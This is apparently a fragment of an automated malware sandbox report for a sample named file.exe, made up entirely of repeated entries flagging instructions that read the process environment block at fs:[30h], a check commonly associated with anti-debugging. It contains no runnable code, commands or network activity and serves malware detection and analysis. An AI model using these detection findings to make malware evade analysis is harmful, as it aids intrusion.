Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D65D0 mov eax, dword ptr fs:[00000030h] 4_2_019D65D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C5ED mov eax, dword ptr fs:[00000030h] 4_2_01A0C5ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C5ED mov eax, dword ptr fs:[00000030h] 4_2_01A0C5ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E5CF mov eax, dword ptr fs:[00000030h] 4_2_01A0E5CF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E5CF mov eax, dword ptr fs:[00000030h] 4_2_01A0E5CF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A5D0 mov eax, dword ptr fs:[00000030h] 4_2_01A0A5D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A5D0 mov eax, dword ptr fs:[00000030h] 4_2_01A0A5D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D25E0 mov eax, dword ptr fs:[00000030h] 4_2_019D25E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66500 mov eax, dword ptr fs:[00000030h] 4_2_01A66500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0656A mov eax, dword ptr fs:[00000030h] 4_2_01A0656A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0656A mov eax, dword ptr fs:[00000030h] 4_2_01A0656A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0656A mov eax, dword ptr fs:[00000030h] 4_2_01A0656A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8550 mov eax, dword ptr fs:[00000030h] 4_2_019D8550
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8550 mov eax, dword ptr fs:[00000030h] 4_2_019D8550
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A044B0 mov ecx, dword ptr fs:[00000030h] 4_2_01A044B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5A4B0 mov eax, dword ptr fs:[00000030h] 4_2_01A5A4B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8A49A mov eax, dword ptr fs:[00000030h] 4_2_01A8A49A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D64AB mov eax, dword ptr fs:[00000030h] 4_2_019D64AB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D04E5 mov ecx, dword ptr fs:[00000030h] 4_2_019D04E5
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A430 mov eax, dword ptr fs:[00000030h] 4_2_01A0A430
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08402 mov eax, dword ptr fs:[00000030h] 4_2_01A08402
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08402 mov eax, dword ptr fs:[00000030h] 4_2_01A08402
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08402 mov eax, dword ptr fs:[00000030h] 4_2_01A08402
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC427 mov eax, dword ptr fs:[00000030h] 4_2_019CC427
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE420 mov eax, dword ptr fs:[00000030h] 4_2_019CE420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE420 mov eax, dword ptr fs:[00000030h] 4_2_019CE420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE420 mov eax, dword ptr fs:[00000030h] 4_2_019CE420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C645D mov eax, dword ptr fs:[00000030h] 4_2_019C645D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F245A mov eax, dword ptr fs:[00000030h] 4_2_019F245A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C460 mov ecx, dword ptr fs:[00000030h] 4_2_01A5C460
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FA470 mov eax, dword ptr fs:[00000030h] 4_2_019FA470
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FA470 mov eax, dword ptr fs:[00000030h] 4_2_019FA470
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FA470 mov eax, dword ptr fs:[00000030h] 4_2_019FA470
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8A456 mov eax, dword ptr fs:[00000030h] 4_2_01A8A456
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A847A0 mov eax, dword ptr fs:[00000030h] 4_2_01A847A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7678E mov eax, dword ptr fs:[00000030h] 4_2_01A7678E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D07AF mov eax, dword ptr fs:[00000030h] 4_2_019D07AF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E7E1 mov eax, dword ptr fs:[00000030h] 4_2_01A5E7E1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DC7C0 mov eax, dword ptr fs:[00000030h] 4_2_019DC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A507C3 mov eax, dword ptr fs:[00000030h] 4_2_01A507C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D47FB mov eax, dword ptr fs:[00000030h] 4_2_019D47FB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D47FB mov eax, dword ptr fs:[00000030h] 4_2_019D47FB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F27ED mov eax, dword ptr fs:[00000030h] 4_2_019F27ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F27ED mov eax, dword ptr fs:[00000030h] 4_2_019F27ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F27ED mov eax, dword ptr fs:[00000030h] 4_2_019F27ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C720 mov eax, dword ptr fs:[00000030h] 4_2_01A0C720
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C720 mov eax, dword ptr fs:[00000030h] 4_2_01A0C720
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0710 mov eax, dword ptr fs:[00000030h] 4_2_019D0710
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4C730 mov eax, dword ptr fs:[00000030h] 4_2_01A4C730
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0273C mov eax, dword ptr fs:[00000030h] 4_2_01A0273C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0273C mov ecx, dword ptr fs:[00000030h] 4_2_01A0273C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0273C mov eax, dword ptr fs:[00000030h] 4_2_01A0273C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C700 mov eax, dword ptr fs:[00000030h] 4_2_01A0C700
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00710 mov eax, dword ptr fs:[00000030h] 4_2_01A00710
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0750 mov eax, dword ptr fs:[00000030h] 4_2_019D0750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0674D mov esi, dword ptr fs:[00000030h] 4_2_01A0674D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0674D mov eax, dword ptr fs:[00000030h] 4_2_01A0674D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0674D mov eax, dword ptr fs:[00000030h] 4_2_01A0674D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8770 mov eax, dword ptr fs:[00000030h] 4_2_019D8770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A54755 mov eax, dword ptr fs:[00000030h] 4_2_01A54755
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12750 mov eax, dword ptr fs:[00000030h] 4_2_01A12750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12750 mov eax, dword ptr fs:[00000030h] 4_2_01A12750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E75D mov eax, dword ptr fs:[00000030h] 4_2_01A5E75D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C6A6 mov eax, dword ptr fs:[00000030h] 4_2_01A0C6A6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4690 mov eax, dword ptr fs:[00000030h] 4_2_019D4690
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4690 mov eax, dword ptr fs:[00000030h] 4_2_019D4690
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A066B0 mov eax, dword ptr fs:[00000030h] 4_2_01A066B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A506F1 mov eax, dword ptr fs:[00000030h] 4_2_01A506F1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A506F1 mov eax, dword ptr fs:[00000030h] 4_2_01A506F1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A6C7 mov ebx, dword ptr fs:[00000030h] 4_2_01A0A6C7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A6C7 mov eax, dword ptr fs:[00000030h] 4_2_01A0A6C7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A06620 mov eax, dword ptr fs:[00000030h] 4_2_01A06620
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08620 mov eax, dword ptr fs:[00000030h] 4_2_01A08620
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E609 mov eax, dword ptr fs:[00000030h] 4_2_01A4E609
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D262C mov eax, dword ptr fs:[00000030h] 4_2_019D262C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12619 mov eax, dword ptr fs:[00000030h] 4_2_01A12619
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE627 mov eax, dword ptr fs:[00000030h] 4_2_019EE627
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A660 mov eax, dword ptr fs:[00000030h] 4_2_01A0A660
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A660 mov eax, dword ptr fs:[00000030h] 4_2_01A0A660
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9866E mov eax, dword ptr fs:[00000030h] 4_2_01A9866E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9866E mov eax, dword ptr fs:[00000030h] 4_2_01A9866E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A02674 mov eax, dword ptr fs:[00000030h] 4_2_01A02674
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EC640 mov eax, dword ptr fs:[00000030h] 4_2_019EC640
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A589B3 mov esi, dword ptr fs:[00000030h] 4_2_01A589B3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A589B3 mov eax, dword ptr fs:[00000030h] 4_2_01A589B3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A589B3 mov eax, dword ptr fs:[00000030h] 4_2_01A589B3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D09AD mov eax, dword ptr fs:[00000030h] 4_2_019D09AD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D09AD mov eax, dword ptr fs:[00000030h] 4_2_019D09AD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E9E0 mov eax, dword ptr fs:[00000030h] 4_2_01A5E9E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A029F9 mov eax, dword ptr fs:[00000030h] 4_2_01A029F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A029F9 mov eax, dword ptr fs:[00000030h] 4_2_01A029F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A669C0 mov eax, dword ptr fs:[00000030h] 4_2_01A669C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A049D0 mov eax, dword ptr fs:[00000030h] 4_2_01A049D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A9D3 mov eax, dword ptr fs:[00000030h] 4_2_01A9A9D3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8918 mov eax, dword ptr fs:[00000030h] 4_2_019C8918
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8918 mov eax, dword ptr fs:[00000030h] 4_2_019C8918
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A6892B mov eax, dword ptr fs:[00000030h] 4_2_01A6892B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5892A mov eax, dword ptr fs:[00000030h] 4_2_01A5892A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E908 mov eax, dword ptr fs:[00000030h] 4_2_01A4E908
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E908 mov eax, dword ptr fs:[00000030h] 4_2_01A4E908
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C912 mov eax, dword ptr fs:[00000030h] 4_2_01A5C912
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E mov eax, dword ptr fs:[00000030h] 4_2_01A1096E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E mov edx, dword ptr fs:[00000030h] 4_2_01A1096E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E mov eax, dword ptr fs:[00000030h] 4_2_01A1096E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C97C mov eax, dword ptr fs:[00000030h] 4_2_01A5C97C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A74978 mov eax, dword ptr fs:[00000030h] 4_2_01A74978
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A74978 mov eax, dword ptr fs:[00000030h] 4_2_01A74978
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A50946 mov eax, dword ptr fs:[00000030h] 4_2_01A50946
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 mov eax, dword ptr fs:[00000030h] 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 mov eax, dword ptr fs:[00000030h] 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 mov eax, dword ptr fs:[00000030h] 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0887 mov eax, dword ptr fs:[00000030h] 4_2_019D0887
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C89D mov eax, dword ptr fs:[00000030h] 4_2_01A5C89D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A8E4 mov eax, dword ptr fs:[00000030h] 4_2_01A9A8E4
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C8F9 mov eax, dword ptr fs:[00000030h] 4_2_01A0C8F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C8F9 mov eax, dword ptr fs:[00000030h] 4_2_01A0C8F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE8C0 mov eax, dword ptr fs:[00000030h] 4_2_019FE8C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A830 mov eax, dword ptr fs:[00000030h] 4_2_01A0A830
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7483A mov eax, dword ptr fs:[00000030h] 4_2_01A7483A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7483A mov eax, dword ptr fs:[00000030h] 4_2_01A7483A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov ecx, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C810 mov eax, dword ptr fs:[00000030h] 4_2_01A5C810
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4859 mov eax, dword ptr fs:[00000030h] 4_2_019D4859
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4859 mov eax, dword ptr fs:[00000030h] 4_2_019D4859
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66870 mov eax, dword ptr fs:[00000030h] 4_2_01A66870
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66870 mov eax, dword ptr fs:[00000030h] 4_2_01A66870
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E872 mov eax, dword ptr fs:[00000030h] 4_2_01A5E872
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E872 mov eax, dword ptr fs:[00000030h] 4_2_01A5E872
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E2840 mov ecx, dword ptr fs:[00000030h] 4_2_019E2840
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00854 mov eax, dword ptr fs:[00000030h] 4_2_01A00854
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84BB0 mov eax, dword ptr fs:[00000030h] 4_2_01A84BB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84BB0 mov eax, dword ptr fs:[00000030h] 4_2_01A84BB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0BBE mov eax, dword ptr fs:[00000030h] 4_2_019E0BBE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0BBE mov eax, dword ptr fs:[00000030h] 4_2_019E0BBE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0BCD mov eax, dword ptr fs:[00000030h] 4_2_019D0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0BCD mov eax, dword ptr fs:[00000030h] 4_2_019D0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0BCD mov eax, dword ptr fs:[00000030h] 4_2_019D0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0BCB mov eax, dword ptr fs:[00000030h] 4_2_019F0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0BCB mov eax, dword ptr fs:[00000030h] 4_2_019F0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0BCB mov eax, dword ptr fs:[00000030h] 4_2_019F0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5CBF0 mov eax, dword ptr fs:[00000030h] 4_2_01A5CBF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEBFC mov eax, dword ptr fs:[00000030h] 4_2_019FEBFC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8BF0 mov eax, dword ptr fs:[00000030h] 4_2_019D8BF0
